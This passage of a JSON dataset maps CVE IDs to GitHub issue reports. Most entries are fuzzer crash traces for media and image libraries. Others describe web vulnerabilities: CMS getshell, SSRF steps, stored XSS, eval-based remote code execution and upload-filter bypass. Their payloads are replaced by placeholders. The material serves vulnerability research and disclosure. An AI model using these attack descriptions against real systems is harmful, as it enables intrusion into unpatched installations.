(in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG bc is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Error: Unknown operator '\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\u007f\ufffd\ufffd\ufffd\u001f\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd' Error: Unknown operator NUMBERTAG Error: Unknown operator NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG C7A2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG BEB: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A5AA: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Address NUMBERTAG fdccfdb8fdb NUMBERTAG is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG General Protection Fault NUMBERTAG at NUMBERTAG C7A2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG BEB: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A5AA: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-19481",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1267",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1267",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-07-05T23:55:18Z",
        "description": "Runtime error: member access within null pointer of type 'GF_M2TS_ES NUMBERTAG APITAG Hi, Our fuzzer found a crash on APITAG (the latest commit NUMBERTAG b on master). APITAG URLTAG Command: APITAG info APITAG ASAN says: ~~~ Multiple different PAT on single TS found, ignoring new PAT declaration (table id NUMBERTAG extended table id NUMBERTAG MPEG NUMBERTAG TS] Invalid PMT es descriptor size for PID NUMBERTAG MPEG NUMBERTAG TS] PID NUMBERTAG reused across programs NUMBERTAG and NUMBERTAG not completely supported PATHTAG runtime error: member access within null pointer of type 'GF_M2TS_ES NUMBERTAG algrind says NUMBERTAG Invalid read of size NUMBERTAG at APITAG gf_m2ts_process_pmt APITAG NUMBERTAG by APITAG gf_m2ts_section_complete APITAG NUMBERTAG by APITAG APITAG APITAG NUMBERTAG by APITAG gf_m2ts_process_packet APITAG NUMBERTAG by APITAG gf_m2ts_process_data APITAG NUMBERTAG by APITAG gf_m2ts_probe_file APITAG NUMBERTAG by APITAG gf_media_import APITAG NUMBERTAG by NUMBERTAG B NUMBERTAG B: convert_file_info APITAG NUMBERTAG by NUMBERTAG D5: APITAG APITAG NUMBERTAG by NUMBERTAG BC NUMBERTAG F: (below main) (libc APITAG NUMBERTAG Address NUMBERTAG is not stack'd, malloc'd or (recently) free'd ~~~ Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-19481",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1266",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1266",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-07-05T23:46:50Z",
        "description": "Runtime error: left shift of NUMBERTAG by NUMBERTAG places cannot be represented in type 'int' APITAG Hi, Our fuzzer found a crash on APITAG (the latest commit NUMBERTAG b on master). APITAG URLTAG Command: APITAG info APITAG ASAN says: ~~~ PATHTAG runtime error: left shift of NUMBERTAG by NUMBERTAG places cannot be represented in type 'int' ~~~ Valgrind says NUMBERTAG Invalid read of size NUMBERTAG at APITAG gf_m2ts_process_pmt APITAG NUMBERTAG by APITAG gf_m2ts_section_complete APITAG NUMBERTAG by APITAG APITAG APITAG NUMBERTAG by APITAG gf_m2ts_process_packet APITAG NUMBERTAG by APITAG gf_m2ts_process_data APITAG NUMBERTAG by APITAG gf_m2ts_probe_file APITAG NUMBERTAG by APITAG gf_media_import APITAG NUMBERTAG by NUMBERTAG B NUMBERTAG B: convert_file_info APITAG NUMBERTAG by NUMBERTAG D5: APITAG APITAG NUMBERTAG by NUMBERTAG BC NUMBERTAG F: (below main) (libc APITAG NUMBERTAG Address NUMBERTAG d8c NUMBERTAG is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by APITAG gf_m2ts_section_complete APITAG NUMBERTAG by APITAG APITAG APITAG NUMBERTAG by APITAG gf_m2ts_process_packet APITAG NUMBERTAG by APITAG gf_m2ts_process_data APITAG NUMBERTAG by APITAG gf_m2ts_probe_file APITAG NUMBERTAG by APITAG gf_media_import APITAG NUMBERTAG by NUMBERTAG B NUMBERTAG B: convert_file_info APITAG NUMBERTAG by NUMBERTAG D5: APITAG APITAG NUMBERTAG by NUMBERTAG BC NUMBERTAG F: (below main) (libc APITAG ~~~ Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-19481",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1265",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1265",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-07-05T23:46:25Z",
        "description": "Runtime error: left shift of negative value APITAG Hi, Our fuzzer found a crash on APITAG (the latest commit NUMBERTAG b on master) due to an invalid read on function gf_m2ts_process_pmt APITAG APITAG URLTAG Command: APITAG info APITAG ASAN says: ~~~ PATHTAG runtime error: left shift of negative value NUMBERTAG algrind says NUMBERTAG Invalid read of size NUMBERTAG at APITAG gf_m2ts_process_pmt APITAG NUMBERTAG by APITAG gf_m2ts_section_complete APITAG NUMBERTAG by APITAG APITAG APITAG NUMBERTAG by APITAG gf_m2ts_process_packet APITAG NUMBERTAG by APITAG gf_m2ts_process_data APITAG NUMBERTAG by APITAG gf_m2ts_probe_file APITAG NUMBERTAG by APITAG gf_media_import APITAG NUMBERTAG by NUMBERTAG B NUMBERTAG B: convert_file_info APITAG NUMBERTAG by NUMBERTAG D5: APITAG APITAG NUMBERTAG by NUMBERTAG BC NUMBERTAG F: (below main) (libc APITAG NUMBERTAG Address NUMBERTAG d8e NUMBERTAG is NUMBERTAG bytes before a block of size NUMBERTAG in arena \"client\" ~~~ Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-19488",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1263",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1263",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-07-05T22:47:55Z",
        "description": "Runtime error: member access within null pointer of type 'struct APITAG Hi, Our fuzzer found a crash on APITAG (the latest commit APITAG on master) due to a null pointer dereference bug on function APITAG APITAG APITAG URLTAG Command: APITAG info APITAG ~~~ [iso file] Read Box type data NUMBERTAG at position NUMBERTAG has size NUMBERTAG but is not at root/file level, skipping NUMBERTAG Invalid read of size NUMBERTAG at APITAG APITAG APITAG NUMBERTAG by NUMBERTAG gf_isom_box_read APITAG NUMBERTAG by NUMBERTAG gf_isom_box_parse_ex APITAG NUMBERTAG by APITAG APITAG APITAG NUMBERTAG by NUMBERTAG gf_isom_box_read APITAG NUMBERTAG by NUMBERTAG gf_isom_box_parse_ex APITAG NUMBERTAG by NUMBERTAG EEB: gf_isom_box_array_read_ex APITAG NUMBERTAG by APITAG APITAG APITAG NUMBERTAG by NUMBERTAG gf_isom_box_read APITAG NUMBERTAG by NUMBERTAG gf_isom_box_parse_ex APITAG NUMBERTAG by NUMBERTAG EEB: gf_isom_box_array_read_ex APITAG NUMBERTAG by APITAG APITAG APITAG NUMBERTAG by NUMBERTAG gf_isom_box_read APITAG NUMBERTAG by NUMBERTAG gf_isom_box_parse_ex APITAG NUMBERTAG by NUMBERTAG EEB: gf_isom_box_array_read_ex APITAG NUMBERTAG by APITAG APITAG APITAG NUMBERTAG Address NUMBERTAG is not stack'd, malloc'd or (recently) free'd Segmentation fault ~~~ ASAN says: ~~~ [iso file] Read Box type data NUMBERTAG at position NUMBERTAG has size NUMBERTAG but is not at root/file level, skipping PATHTAG runtime error: member access within null pointer of type 'struct APITAG ~~~ Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-19490",
        "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/124",
        "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/124",
        "Repo_new": "syoyo/tinyexr",
        "Issue_Created_At": "2019-07-07T06:43:59Z",
        "description": "Crash on APITAG Hi, Our fuzzer found a crash on tinyexr (the latest commit APITAG on master). I use your command to compile tinyexr as mentioned in NUMBERTAG URLTAG (clang++ version NUMBERTAG Ubuntu NUMBERTAG bit). APITAG URLTAG Command: test_tinyexr $POC Valgrind says NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG B2: APITAG char , int const , unsigned char const , unsigned long, int, int, int, int, int, int, int, int, unsigned long, unsigned long, APITAG const , unsigned long, APITAG const , std::vector<unsigned long, std::allocator<unsigned long> > const&) [clone . APITAG APITAG NUMBERTAG by NUMBERTAG CD8: APITAG , APITAG const , std::vector<unsigned long long, std::allocator<unsigned long long> > const&, unsigned char const , unsigned long, std::string ) [clone . APITAG APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG D3A7: APITAG APITAG NUMBERTAG by NUMBERTAG B NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG C2: main APITAG NUMBERTAG Address NUMBERTAG ffffff NUMBERTAG b1e NUMBERTAG is not stack'd, malloc'd or (recently) free'd ~~~ ASAN says: ~~~ APITAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'int' SUMMARY: APITAG undefined behavior APITAG in APITAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'int' SUMMARY: APITAG undefined behavior APITAG in ASAN:DEADLYSIGNAL APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG c0 (pc NUMBERTAG de NUMBERTAG bp NUMBERTAG ffe NUMBERTAG ce NUMBERTAG sp NUMBERTAG ffe NUMBERTAG c NUMBERTAG T0) APITAG signal is caused by a WRITE memory access NUMBERTAG de NUMBERTAG in APITAG char , int const , unsigned char const , unsigned long, int, int, int, int, int, int, int, int, unsigned long, unsigned long, APITAG const , unsigned long, APITAG const , std::vector<unsigned long, std::allocator<unsigned long> > const&) PATHTAG NUMBERTAG b NUMBERTAG fd in APITAG , APITAG const , std::vector<unsigned long long, std::allocator<unsigned long long> > const&, unsigned char const , unsigned long, APITAG std::char_traits APITAG , std::allocator APITAG > ) PATHTAG NUMBERTAG b NUMBERTAG in APITAG , APITAG const , unsigned char const , unsigned char const , unsigned long, char const ) PATHTAG NUMBERTAG fe in APITAG PATHTAG NUMBERTAG e1 in APITAG PATHTAG NUMBERTAG de1e in APITAG PATHTAG NUMBERTAG bd NUMBERTAG in main PATHTAG NUMBERTAG fdba NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in APITAG char , int const , unsigned char const , unsigned long, int, int, int, int, int, int, int, int, unsigned long, unsigned long, APITAG const , unsigned long, APITAG const , std::vector<unsigned long, std::allocator<unsigned long> > const NUMBERTAG ABORTING ~~~ Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-19491",
        "Issue_Url_old": "https://github.com/pts/sam2p/issues/67",
        "Issue_Url_new": "https://github.com/pts/sam2p/issues/67",
        "Repo_new": "pts/sam2p",
        "Issue_Created_At": "2019-07-18T11:15:24Z",
        "description": "SEGV in APITAG APITAG Hi, I found a crash in the function APITAG on the latest commit APITAG of master. It seems that it is due to an incomplete patch of NUMBERTAG URLTAG . APITAG URLTAG Command: sam2p APITAG FILETAG ASAN says NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG bp NUMBERTAG fff NUMBERTAG aaa0 sp NUMBERTAG fff NUMBERTAG aa NUMBERTAG T NUMBERTAG in APITAG , int, unsigned char ) PATHTAG NUMBERTAG e9df in APITAG ) PATHTAG NUMBERTAG ec NUMBERTAG in in_gif_reader PATHTAG NUMBERTAG in APITAG , APITAG const&, char const ) PATHTAG NUMBERTAG f3 in APITAG Files::FILEW&, char const const , unsigned char) PATHTAG NUMBERTAG a NUMBERTAG e in main PATHTAG NUMBERTAG f4e3c NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG fa8 in _start ( PATHTAG ) ~~~ Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-19497",
        "Issue_Url_old": "https://github.com/tbeu/matio/issues/121",
        "Issue_Url_new": "https://github.com/tbeu/matio/issues/121",
        "Repo_new": "tbeu/matio",
        "Issue_Created_At": "2019-07-27T07:03:07Z",
        "description": "SEGV in APITAG Hi, I found a crash in APITAG (the latest commit APITAG on master). APITAG URLTAG Command: matdump APITAG ASAN says NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG efcf (pc NUMBERTAG ff5bd4a NUMBERTAG ce bp NUMBERTAG ffd NUMBERTAG b NUMBERTAG sp NUMBERTAG ffd NUMBERTAG b NUMBERTAG T NUMBERTAG ff5bd4a NUMBERTAG cd in APITAG PATHTAG NUMBERTAG ff5bd4b8c NUMBERTAG in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG ff5bcc9a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG ) ~~~ Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19498",
        "Issue_Url_old": "https://github.com/strukturag/libheif/issues/139",
        "Issue_Url_new": "https://github.com/strukturag/libheif/issues/139",
        "Repo_new": "strukturag/libheif",
        "Issue_Created_At": "2019-07-28T10:14:30Z",
        "description": "Floating point exception. Hi, I found a FPE bug on the latest commit fd0c NUMBERTAG d on master. APITAG URLTAG Command: examples/heif info APITAG Valgrind says NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGFPE NUMBERTAG Integer divide by zero at address NUMBERTAG AC NUMBERTAG at NUMBERTAG Fraction APITAG NUMBERTAG by NUMBERTAG operator APITAG NUMBERTAG by NUMBERTAG APITAG const APITAG NUMBERTAG by NUMBERTAG F NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG const ) APITAG NUMBERTAG by NUMBERTAG F: heif_context_read_from_file APITAG NUMBERTAG by NUMBERTAG ERRORTAG NUMBERTAG main APITAG Floating point exception ~~~ Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19499",
        "Issue_Url_old": "https://github.com/strukturag/libheif/issues/138",
        "Issue_Url_new": "https://github.com/strukturag/libheif/issues/138",
        "Repo_new": "strukturag/libheif",
        "Issue_Created_At": "2019-07-28T00:11:00Z",
        "description": "SEGV in APITAG Hi, I found a bug on the latest commit fd0c NUMBERTAG d on master. APITAG URLTAG Command: examples/heif convert APITAG FILETAG ASAN says NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG c bp NUMBERTAG ffc1ade NUMBERTAG a0 sp NUMBERTAG ffc1ade NUMBERTAG T NUMBERTAG b in APITAG APITAG APITAG const PATHTAG NUMBERTAG in APITAG int, unsigned int) const PATHTAG NUMBERTAG b6 in APITAG int, unsigned int&) const PATHTAG NUMBERTAG a in APITAG const PATHTAG NUMBERTAG c1a4 in APITAG PATHTAG NUMBERTAG fc in main PATHTAG NUMBERTAG f1ac NUMBERTAG d NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG ERRORTAG f NUMBERTAG in _start ( PATHTAG ERRORTAG f NUMBERTAG Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19527",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/66",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/66",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2019-06-03T09:54:00Z",
        "description": "ICMS install Getshell. ICMS install Getshell Vulnerability location\uff1a$db_name parameter in \\icms NUMBERTAG FILETAG . Cause :$db_name parameter is written directly to FILETAG without filtering CODETAG attack: FILETAG FILETAG Then request: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19547",
        "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/19",
        "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/19",
        "Repo_new": "popojicms/popojicms",
        "Issue_Created_At": "2019-06-05T07:08:34Z",
        "description": "Any file read in the background. FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19551",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/177",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/177",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2019-06-04T09:56:39Z",
        "description": "Remote Code Execution Vulnerability in WUZHI CMS NUMBERTAG Remote Code Execution Vulnerability in WUZHI CMS NUMBERTAG File extension blacklist bypass when file upload can cause arbitrarily code execution. Detail: FILETAG sysorem.li APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19553",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/179",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/179",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2019-06-05T08:56:04Z",
        "description": "Stored Cross Scripting Vulnerability Vulnerability in WUZHI CMS APITAG Stored Cross Scripting Vulnerability Vulnerability in WUZHI CMS NUMBERTAG attacker can upload the specific file to the server & it can cause javascript code execution when visited. View Detail APITAG Stored Cross Scripting APITAG hiboy APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-19613",
        "Issue_Url_old": "https://github.com/sunkaifei/FlyCms/issues/1",
        "Issue_Url_new": "https://github.com/sunkaifei/flycms/issues/1",
        "Repo_new": "sunkaifei/flycms",
        "Issue_Created_At": "2019-06-12T09:54:51Z",
        "description": "There is a SSRF vulnerability. An issue was discovered in APITAG There is a security vulnerability in file APITAG , in APITAG function, result in a SSRF . SSRF \u00ad Server Side Request Forgery attacks. The ability to create requests from the vulnerable server to intra/internet. POC APITAG Send the request is as follows\uff1a CODETAG FILETAG We can see that it will call APITAG to fetch remote image when add a question. FILETAG In funtion APITAG can use APITAG bypass reg or request other url directly\uff0cand APITAG is called here. FILETAG Finally APITAG result in SSRF. FILETAG Still in APITAG we can find the file path, file APITAG APITAG finally failed, but file will create. File path is the date tody, example APITAG File name is concat md5(date + filenum) + filenum + extension FILETAG md NUMBERTAG result is NUMBERTAG of md NUMBERTAG resulst. FILETAG And we can get server time from response, after convert timezone, we can caculate the result. FILETAG so filename is APITAG \uff0cabsolute path is APITAG Request the path we can download file named APITAG . FILETAG It's SSRF result.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19616",
        "Issue_Url_old": "https://github.com/langhsu/mblog/issues/27",
        "Issue_Url_new": "https://github.com/langhsu/mblog/issues/27",
        "Repo_new": "langhsu/mblog",
        "Issue_Created_At": "2019-06-14T03:01:27Z",
        "description": "There are two stored XSS vulnerability. A xss vulnerability was discovered in mblog. In mblog NUMBERTAG stored XSS exists via the APITAG value parameter, which allows remote attackers to inject arbitrary web script or HTML. poc ERRORTAG FILETAG FILETAG Another stored XSS exists via the APITAG value parameter, which allows remote attackers to inject arbitrary web script or HTML. poc ERRORTAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-19625",
        "Issue_Url_old": "https://github.com/oria/gridx/issues/433",
        "Issue_Url_new": "https://github.com/oria/gridx/issues/433",
        "Repo_new": "oria/gridx",
        "Issue_Created_At": "2019-06-14T01:51:59Z",
        "description": "Remote Code Execution Vulnerability in gridx latest version. hi, We found a remote code execution vulnerability in gridx latest version that could allow an attacker to remotely execute arbitrary code to attack an attack server. FILETAG code line in NUMBERTAG The query parameter is directly brought into the eval function. payload: URLTAG This payload execution APITAG FILETAG fix: In php, the eval function is dangerous. It is not recommended to use it. If you must use it, you need to limit the incoming data.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-19667",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1895",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1895",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2020-04-14T10:46:31Z",
        "description": "stack buffer overflow at APITAG in APITAG Prerequisites \u2705 ] I have written a descriptive issue title [ \u2705] I have verified that I am using the latest version of APITAG [ \u2705] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description There's a stack buffer overflow at APITAG in APITAG poc URLTAG Steps to Reproduce run_cmd APITAG Here's ASAN log. ERRORTAG System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): zlib Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Additional information: ERRORTAG edit by peanuts , and Is it possible to request a cve id\uff1f APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-19668",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/136",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/136",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2020-04-15T10:14:08Z",
        "description": "Unverified indexs into the array lead to out of bound access in APITAG run_cmd APITAG poc URLTAG the asan log ERRORTAG analyse : I use the gdb to debug the bug. I found in the APITAG ,the APITAG is larger than the structure of g which define as NUMBERTAG so the crash occur\uff01 source code is here: ERRORTAG bug position: ERRORTAG gdb log \uff1a ERRORTAG version: CODETAG complies command APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-19669",
        "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/4",
        "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/4",
        "Repo_new": "weng-xianhu/eyoucms",
        "Issue_Created_At": "2019-06-27T04:58:55Z",
